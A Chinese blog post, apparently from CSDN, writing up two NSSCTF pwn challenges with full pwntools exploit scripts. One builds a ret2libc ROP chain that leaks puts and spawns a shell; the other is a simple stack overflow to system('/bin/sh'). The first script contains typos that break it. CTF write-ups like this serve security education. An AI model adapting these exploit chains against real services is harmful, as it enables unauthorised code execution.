NSSCTF(PWN)12

最新推荐文章于 2024-11-11 22:04:04 发布
最新推荐文章于 2024-11-11 22:04:04 发布
阅读量475 收藏 5
点赞数 12
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142786648
版权

[BJDCTF 2020]babyrop

查看发现是64位文件

main函数中发现vuln,双击进入

涉及了栈溢出

且这道题是没有system和binsh的

from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node4.anna.nssctf.cn','28025')
elf = ELF('/home/xp/tm/bin/n')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
vuln = elf.sym['vuln']
ret = 0x4004c9
rdi = 0x400733
padding = b'a'*(0x20+0x8)
io.recvuntil(b'story!')
payload = padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
io.sendline(payload)
put=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(put))
libc = LibcSearcher('puts',put)
base = put - libc.dump('puts')
sys = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')
payload1 = padding + p64(ret) + p64(rdi) + p64(binsh) + p64(sys)
io.sednline(payload1)
io.interaction()

[SWPUCTF 2022 新生赛]Integer Overflow

发现是32位文件

查看main函数,发现overflow双击进入

要输入1进入choice1

输入的不能大于10,并且涉及了栈溢出

发现了system和binsh

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','20612')
system = 0x80494fb
binsh = 0x804A008
io.recvuntil(b'choice:')
io.sendline(str(1))
io.recvuntil(b'name:')
io.sendline(str(-1))
padding = b'a'*(0x20+0x4)
io.recvuntil(b'name?')
payload = padding + p32(system)  + p32(binsh)
io.sendline(payload)
io.interactive()

樊少泽
关注
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1994
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
NSSCTF(PWN)
fanshaoze的博客
09-28 390
题目标注nc签到题,我们在虚拟机里用nc,要输入su变成root,才能得到flag。
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 790
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1779
这不是欺负老实人嘛~
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3591
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
NSSCTF(PWN)5
fanshaoze的博客
09-30 438
使用checksec知道是64位文件发现print_flag我们双击进入发现flag藏在这里面,我们回头去看if(v5)的条件,知道我们V5不能为0,这里涉及了栈溢出这个是我们要溢出的栈,直接b'a'*(0x1F+0x8)还有一种方法直接nc然后输入大量字符。
NSSCTF(PWN)15
fanshaoze的博客
10-24 505
发现是64位文件进入vuln发现read典型栈溢出发现这里有system和binsh知道了后门地址。
NSSCTF(PWN)8
fanshaoze的博客
10-07 451
是32位文件main函数里发现了dofunc双击进入发现了read这里涉及了典型的栈溢出发现没有binsh只有system,我们可以把之前找到的buf双击点开发现bss当做binsh用,这题涉及到了shellcode注意这题的system里没有binsh要我们自己搭建一个binsh框架。
NSSCTF(PWN)3
fanshaoze的博客
09-29 429
这是一道简单的nc签到题,直接终端nc就行。
nssctf pwn
10-24
NSSCTF (National Security Service CTF) 是一种网络安全比赛,其中pwn (Payload Writing and Exploitation) 题目通常涉及漏洞利用和内存安全相关的挑战。在这样的竞赛中,参赛者需要找到程序中存在的安全漏洞,如...
[BUUCTF]Pwn刷题记录
x0r
10-13 268
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
PWN要点记录
m0_51246873的博客
09-23 145
PWN 要点
【ctf】 关于确定靶机上的libc版本
qq_31808893的博客
02-07 473
记录一下经验,有时候通过泄露的单一地址 如 puts printf 等用工具查或者手动查会查出很多libc版本,一个个试是一种办法,不过有一种方法可以更精确确定libc版本。
linux长时间运行任务中断报警trap
djl的专栏,blog.djl.cx好记
11-08 292
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 1145
rocky 部署Harbor私有镜像仓库
linux-find和zgrep
luxideyao的专栏
11-07 332
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
Linux:网络协议socket
Au_ust的博客
11-05 1201
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Xshell,Shell的相关介绍与Linux中的权限问题
2301_81265915的博客
11-09 625
首先,先介绍一下我们学习Linux的工具:XshellXShell 是一个流行的 Windows 平台上的 SSH、Telnet 和 Rlogin 客户端,主要用于远程连接 Linux/Unix 系统。它的运行原理大致如下:1:协议支持: XShell 支持多种远程协议(如 SSH、Telnet、Rlogin 等)。最常用的是 SSH 协议,它提供了安全的加密通信。SSH(Secure Shell)通过加密对客户端和服务器之间的通信进行保护,以防止数据在网络中被窃听和篡改。2:建立连接。
SimpleScreenRecorder, a screen recording tool for Linux
最新发布
likecayon的博客
11-11 209
【代码】SimpleScreenRecorder, a screen recording tool for Linux
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值